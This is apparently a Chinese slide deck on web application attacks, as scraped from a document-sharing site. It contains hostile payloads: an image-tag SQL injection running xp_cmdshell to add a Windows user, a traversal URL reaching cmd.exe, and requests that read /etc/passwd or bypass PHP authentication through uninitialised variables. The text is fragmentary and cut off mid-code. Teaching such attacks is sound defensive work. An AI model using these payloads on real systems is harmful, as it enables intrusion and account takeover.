原创力文档- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
web应用攻击技术幻灯片
* * * * * * * img src = delete.asp?id=33;USE master; EXEC dbo.xp_cmdshell net user ddd aa /add/img * * * * 伪装挂马:黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级欺骗技术,当用户访问木马页面时地址栏显示或者等用户信任地址,其实却打开了被挂马的页面,从而实现欺骗 * 伪装挂马:黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级欺骗技术,当用户访问木马页面时地址栏显示或者等用户信任地址,其实却打开了被挂马的页面,从而实现欺骗 * 伪装挂马:黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级欺骗技术,当用户访问木马页面时地址栏显示或者等用户信任地址,其实却打开了被挂马的页面,从而实现欺骗 * * * * * * * * 沙箱有环境的问题 * * 现在很多攻击都是针对windows的IIS+ASP+SQLserver,那么其他平台是否安全呢?实际上安全没有100%,微软的平台之所以被攻击得多,是因为用的人多,研究它的人也就多。当Linux,Freebsd等Unix系统的逐渐流行,对这些系统的研究和攻击也越来越多,越来越快。 这里就介绍一个对PHP脚本的特有攻击。 * * 以上为问题PHP脚本,该脚本的本意是,当pass变量(通常为密码),为“hello”的时候,将auth变量设置为1;当auth变量为1的时候,用户能获得“important information”,但该脚本没有对auth这个变量进行初始化。 * 导致Hacker可以自行定义,将auth变量进行赋值,那么不管密码是否正确,都能获得“important information” * * * * * * * 自定义变量绕过验证 提交http://victim/test_1.php?auth=1 PHP特有漏洞攻击——利用远程文件攻击 代码 <?php
if (!($fd = fopen($filename, r))
echo(Could not open file: $filename<BR>\n);
?> 如果指定$filename为 http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir PHP特有漏洞攻击——利用远程文件攻击 代码 <?php
include($libdir . /languages.php);
?> <?php
passthru(/bin/ls /etc);
?> PHP特有漏洞攻击——利用文件上载攻击 代码 <FORM METHOD=POST ENCTYPE=multipart/form-data>
<INPUT TYPE=FILE NAME=hello>
<INPUT TYPE=HIDDEN NAME=MAX_FILE_SIZE VALUE=10240>
<INPUT TYPE=SUBMIT>
</FORM> PHP特有漏洞攻击——利用文件上载攻击 代码 PHP设置了四个全局变量来描述上载文件: $hello = Filename on local machine (/tmp/phpxXuoXG)
$hello_size = Size in bytes of file (1024)
$hello_name = The original name of the file on the remote system (c:\\temp\\hello.txt)
$hello_type = Mime type of uploaded file ( text/plain) PHP特有漏洞攻击——利用文件上载攻击 代码 任何远程用户都可以指定hello变量: http://vulnhost/vuln.php?hello=/etc/passwdhello_size=10240hello_type=text/plainhello_name=hello.txt PHP特有漏洞攻击——利用文件上载攻击 代码 作为文件上载的攻击方法的一个变种: <?php
if (file_exists($theme)) // Checks the file exists on the local system (noremote files)
include($theme);
?> PHP特有漏洞攻击——通过Session文件攻击 代码 <?php
session_destroy();//Kill any data currently in the session
$session_auth = shaun;
session_register(s
文档评论(0)